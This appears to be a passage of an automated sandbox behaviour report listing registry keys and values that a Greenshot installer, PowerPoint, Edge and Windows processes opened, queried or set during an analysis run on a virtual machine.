| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\DllHost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Greenshot-INSTALLER-1.2.10.6-RELEASE.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files\Greenshot\Plugins\GreenshotOCRPlugin\greenshotocrcommand.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\PING.EXE | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\Clipup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\system32\Clipup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | C:\Windows\System32\clipup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\System32\clipup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\Clipup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\Clipup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\Clipup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\Clipup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\System32\clipup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\System32\clipup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\System32\clipup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\System32\clipup.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Control Panel\Desktop | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Control Panel\Desktop\Pattern Upgrade = "TRUE" | C:\Windows\system32\rundll32.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Program Files\Greenshot\Greenshot.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202020202020202 | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Windows\System32\PickerHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1024x768x96(1).y = "4294935296" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\3 = 78003100000000004759005f1100557365727300640009000400efbec5522d606d59e73a2e0000006c0500000000010000000000000000003a00000000002dcc690055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 | C:\Program Files\Greenshot\Greenshot.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 03000000010000000200000000000000ffffffff | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1092616193" | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\System32\PickerHost.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Greenshot\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Program Files\Greenshot\Greenshot.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Mode = "1" | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\ComDlg | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" | C:\Windows\System32\PickerHost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff | C:\Windows\System32\PickerHost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 020000000000000001000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1024x768x96(1).x = "4294935296" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 010000000200000000000000ffffffff | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\IconSize = "96" | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\System32\PickerHost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupView = "0" | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} | C:\Windows\System32\PickerHost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239} | C:\Windows\System32\PickerHost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\NodeSlot = "3" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files\Greenshot\Greenshot.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Mode = "1" | C:\Windows\System32\PickerHost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\System32\PickerHost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\Windows\System32\PickerHost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2 = 56003100000000004759e862100057696e646f777300400009000400efbec5522d606d59e73a2e000000a6050000000001000000000000000000000000000000407b1000570069006e0064006f0077007300000016000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Program Files\Greenshot\Greenshot.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupView = "0" | C:\Windows\System32\PickerHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell | C:\Windows\System32\PickerHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings | C:\Windows\system32\control.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByKey:PID = "0" | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\explorer.exe | N/A |
